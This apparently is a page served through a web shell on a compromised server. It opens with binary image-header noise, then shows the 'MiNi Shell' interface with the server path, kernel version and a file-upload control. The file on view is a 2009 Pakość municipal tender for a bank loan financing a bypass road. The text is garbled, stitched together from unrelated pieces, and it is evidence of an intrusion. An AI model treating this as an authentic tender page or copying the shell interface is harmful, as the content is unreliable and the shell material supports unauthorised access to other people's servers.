JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090414/62175-N-2009.html

<p class="kh_header"><b>Pakość: Udzielenie i obsługa kredytu długoterminowego złotowego w kwocie 3 958 021 zł (słownie: trzy miliony dziewięćset pięćdziesiąt osiem tysięcy dwadzieścia jeden zł 00/100), z przeznaczeniem na sfinansowanie inwestycji: Budowa obwodnicy m. Pakości - przebudowa ulic Cmentarna, Mikołaja i Mogileńska w Pakości łączących drogi wojewódzkie nr 251 i 255</b><br>
<b>Numer ogłoszenia: 62175 - 2009; data zamieszczenia: 14.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pakość , ul. Rynek 4, 88-170 Pakość, woj. kujawsko-pomorskie, tel. 052 5666073 (74), 5666089, faks 052 5666075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pakosc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługa kredytu długoterminowego złotowego w kwocie 3 958 021 zł (słownie: trzy miliony dziewięćset pięćdziesiąt osiem tysięcy dwadzieścia jeden zł 00/100), z przeznaczeniem na sfinansowanie inwestycji: Budowa obwodnicy m. Pakości - przebudowa ulic Cmentarna, Mikołaja i Mogileńska w Pakości łączących drogi wojewódzkie nr 251 i 255.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Udzielenie i obsługa kredytu długoterminowego złotowego w kwocie 3 958 021 zł (słownie: trzy miliony dziewięćset pięćdziesiąt osiem tysięcy dwadzieścia jeden zł 00/100), z przeznaczeniem na sfinansowanie inwestycji: Budowa obwodnicy m. Pakości - przebudowa ulic Cmentarna, Mikołaja i Mogileńska w Pakości łączących drogi wojewódzkie nr 251 i 255.
 
Nomenklatura zgodnie ze słownikiem CPV: 66.11.30.00-5
1.  Przedmiotem zamówienia jest usługa bankowa polegająca na udzieleniu i obsłudze kredytu długoterminowego złotowego w kwocie 3 958 021 zł z przeznaczeniem na sfinansowanie inwestycji pn. Budowa obwodnicy m. Pakości - przebudowa ulic Cmentarna, Mikołaja i Mogileńska w Pakości łączących drogi wojewódzkie nr 251 i 255.

2.  Kredyt zamierzamy zaciągnąć według formuły WIBOR 3M + stała marża banku.

3.  Na cenę kredytu składać się będzie: 
a) oprocentowanie kredytu wg zmiennej stopy WIBOR 3M powiększona o marżę Banku-kredytodawcy, (wyrażone w procentach oraz wyrażone wartościowo w PLN w całym okresie kredytowania),
b) prowizji przygotowawczej banku (kwota wyrażona w PLN). 

4. W związku z podjętą w dniu 12 marca 2009r. uchwałą Rady Miejskiej w Pakości nr XXII/185/09 w sprawie zaciągnięcia kredytu długoterminowego, przyjmuje się wypłatę kredytu w dwóch transzach:
- w 2009 roku w wysokości      846 504 zł
- w 2010 roku w wysokości   3 111 517 zł

5. Planowany budżet na 2009 rok po stronie dochodów wynosi 20.026.986,00 zł  a po stronie wydatków  27.630.598,00 zł.

6.  Spłatę kredytu planuje się w następujących terminach:

Lp.	Termin zapłaty	Wysokość raty		Lp.	Termin zapłaty	Wysokość raty
1	31.03.2010	66 650 zł		33	31.03.2018	66 650 zł
2	30.06.2010	66 650 zł		34	30.06.2018	66 650 zł
3	30.09.2010	66 650 zł		35	30.09.2018	66 650 zł
4	31.12.2010	66 650 zł		36	31.12.2018	66 650 zł
5	31.03.2011	66 650 zł		37	31.03.2019	66 650 zł
6	30.06.2011	66 650 zł		38	30.06.2019	66 650 zł
7	30.09.2011	66 650 zł		39	30.09.2019	66 650 zł
8	31.12.2011	66 650 zł		40	31.12.2019	66 650 zł
9	31.03.2012	66 650 zł		41	31.03.2020	66 650 zł
10	30.06.2012	66 650 zł		42	30.06.2020	66 650 zł
11	30.09.2012	66 650 zł		43	30.09.2020	66 650 zł
12	31.12.2012	66 650 zł		44	31.12.2020	66 650 zł
13	31.03.2013	66 650 zł		45	31.03.2021	66 650 zł
14	30.06.2013	66 650 zł		46	30.06.2021	66 650 zł
15	30.09.2013	66 650 zł		47	30.09.2021	66 650 zł
16	31.12.2013	66 650 zł		48	31.12.2021	66 650 zł
17	31.03.2014	66 650 zł		49	31.03.2022	66 650 zł
18	30.06.2014	66 650 zł		50	30.06.2022	66 650 zł
19	30.09.2014	66 650 zł		51	30.09.2022	66 650 zł
20	31.12.2014	66 650 zł		52	31.12.2022	66 650 zł
21	31.03.2015	66 650 zł		53	31.03.2023	66 650 zł
22	30.06.2015	66 650 zł		54	30.06.2023	66 650 zł
23	30.09.2015	66 650 zł		55	30.09.2023	66 650 zł
24	31.12.2015	66 650 zł		56	31.12.2023	66 650 zł
25	31.03.2016	66 650 zł		57	31.03.2024	66 650 zł
26	30.06.2016	66 650 zł		58	30.06.2024	66 650 zł
27	30.09.2016	66 650 zł		59	30.09.2024	66 650 zł
28	31.12.2016	66 650 zł		60	31.12.2024	25 671 zł
29	31.03.2017	66 650 zł		
30	30.06.2017	66 650 zł		
31	30.09.2017	66 650 zł		
32	31.12.2017	66 650 zł		

7. Kredyt spłacany będzie w ratach kwartalnych.

8. Źródłem spłat będą dochody własne z tytułu podatku od nieruchomości

9. Dla obliczenia odsetek od kredytu należy przyjąć, iż rok stanowi 365 dni. 

10. Dla obliczenia odsetek od kredytu należy przyjąć stawkę
 WIBOR 3 M na dzień 16 kwietnia 2009r. - powiększoną o marżę Banku-kredytodawcy (wyrażona w procentach oraz wyrażoną w wartości PLN dla całego okresu kredytowania),

11. Do obliczenia ceny należy przyjąć, iż data uruchomienia kredytu nastąpi:
dnia 01.10.2009r. w kwocie        846 504 zł
dnia 01.02.2010r. w kwocie     3 111 517 zł

12. Spłata odsetek od zaciągniętego kredytu następować będzie miesięcznie, na ostatni dzień każdego miesiąca, począwszy od miesiąca, w którym kredyt zostanie uruchomiony.
 


13.  Zabezpieczenie kredytu: weksel in blanco.

14. Zamówienie obejmuje także następujące warunki:

a) możliwość wcześniejszej spłaty całości lub części kredytu bez dodatkowych prowizji i opłat (odsetki naliczane do dnia spłaty kredytu);

b) Wykonawca jest obowiązany do skalkulowania i podania w ofercie wyłącznie dwóch stawek w następujący sposób:
- Oprocentowanie kredytu w stosunku do stopy procentowej WIBOR 3M (wg stawki na dzień 16 kwietnia 2009 r.) powiększoną o kwotę  marży Banku (wyrażona w procentach),  Marża Banku jest wiążąca w całym okresie kredytowania. Wykonawca jest obowiązany wliczyć wszelkie opłaty do oprocentowania kredytu w taki sposób, aby skalkulować i przedstawić w ofercie jedną stawkę procentową zwaną bazową (wyrażoną w procentach). Wykonawca określi wartość odsetek wyrażonych kwotowo w PLN w całym okresie kredytowania.
- Wysokość prowizji przygotowawczej liczonej jako %  od całej kwoty kredytu (wyrażoną w PLN). Przez prowizję należy rozumieć sumę wszystkich opłat związanych z uruchomieniem kredytu.
c) Zamawiający zastrzega możliwość wykorzystania mniejszej kwoty kredytu oraz wcześniejszej spłaty w przypadku otrzymania środków z innych źródeł bez ponoszenia z tego tytułu dodatkowych prowizji i opłat. 
W przypadku wcześniejszej spłaty kredytu, odsetki liczone będą za okres jego faktycznego wykorzystania.

Oznaczenie wg Wspólnego Słownika Zamówień: : 66.11.30.00-5.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2024.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Warunki podstawowe zgodnie z art. 22 ust. 1 ustawy - należy potwierdzić w oświadczeniu na jednym arkuszu (załącznik nr 4 SIWZ). Wykonawca oświadcza, że: 
a)	posiada uprawnienia do wykonywania określonej działalności,
b)	posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zapewnienie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, 
c)	znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)	nie podlega wykluczeniu z postępowania o udzielenie zamówienia, stosownie do art. 24 ustawy.
       2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne.
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą: spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki wykonawca spełnił.
3.  Z ubiegania się o zamówienia publicznego wyklucza się wykonawców, którzy: 
-	nie spełniają warunków udziału w postępowaniu o zamówienie publiczne z art. 22 Prawa zamówień publicznych opisanych w ppkt. 1 lit a-d, 
-	wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania, lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności chyba, że udział tych wykonawców w postępowaniu nie utrudnia uczciwej konkurencji, 
-	złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania,
-	nie złożyli oświadczenia o spełnianiu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnianie tych warunków z zastrzeżeniem art. 26 ust. 3, 
-	o których mowa w art. 24 ust. 1 Prawa zamówień publicznych.

4. Zamawiający odrzuci ofertę, jeżeli:
1) jest niezgodna z ustawą - Prawo zamówień publicznych,
2) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3,
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5) została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6) zawiera błędy w obliczeniu ceny,
7) wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt.3 Pzp.,
8) jest nieważna na podstawie odrębnych przepisów.

Zgodnie z treścią art. 92 ust. 1 pkt 2 ustawy Pzp niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający zawiadomi Wykonawców, którzy złożyli oferty o Wykonawcach, których oferty zostały odrzucone, podając uzasadnienie faktyczne i prawne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Wypełniony Formularz ofertowy wraz z dołączoną symulacją spłaty odsetek w poszczególnych miesiącach okresu kredytowania (zał. nr 1) ;
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3) dokument potwierdzający prawo do występowania w obrocie prawnym w zależności od
ustawy, na mocy której utworzony został bank, w szczególności:
a-	bank państwowy, utworzony na podstawie ustawy Prawo bankowe: Rozporządzenie Ministra Skarbu Państwa o utworzeniu banku państwowego, 
b-	banki spółdzielcze oraz banki w formie spółki akcyjnej, powołane na podstawie ustawy -Kodeks spółek handlowych - Zezwolenie Komisji Nadzoru Bankowego, aktualny odpis z właściwego rejestru,
4)Dokumenty potwierdzające posiadanie uprawnień do reprezentowania wykonawcy pełnomocnictw osób składających ofertę, o ile fakt nie wynika z przedstawionych dokumentów rejestrowych. 
-Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z prawa lub innych dokumentów.
Uwaga: Pełnomocnictwo należy załączyć tylko wówczas, jeżeli osoba lub osoby podpisujące ofertę nie figurują w odpowiednich rejestrach i nie są uprawnieni do reprezentowania oferenta.

5) Pełnomocnictwo dla podmiotów występujących wspólnie.
Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowaniu w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia. 
Uwaga: Pełnomocnictwo należy załączyć tylko wówczas, jeżeli dotyczy.
6) Zaświadczenie z właściwego Urzędu Skarbowego o braku zaległości podatkowych (wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert).
7) Zaświadczenie z ZUS o nie zaleganiu ze składkami na ubezpieczenie społeczne i zdrowotne(wydane nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert) lub oświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
8)Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 
9) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu. 
10) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu z art. 22 Prawa zamówień publicznych (zał. nr 2). 
11) Zaakceptowane warunki istotnych elementów umowy kredytowej (zał. nr 32).
Dokumenty ww. muszą być złożone w formie oryginałów lub kserokopii poświadczonej przez Oferenta za zgodność z oryginałem (§ 4 Rozporządzenie Prezesa Rady Ministrów z dnia 19.05.2006 r. - Dz. U. z 2006r., Nr 87, poz.605).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.pakosc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ udostępnione jest na stronie internetowej zamawiającego www.bip.pakosc.pl oraz w siedzibie zamawiającego - pokój nr 18, I piętro ul. Rynek 4, 88-170 Pakość..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2009 godzina 09:30, miejsce: W siedzibie Zamawiającego- w sekretariacie (parter, pok. nr 5)  przy ul. Rynek 4 w Pakości (88-170).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com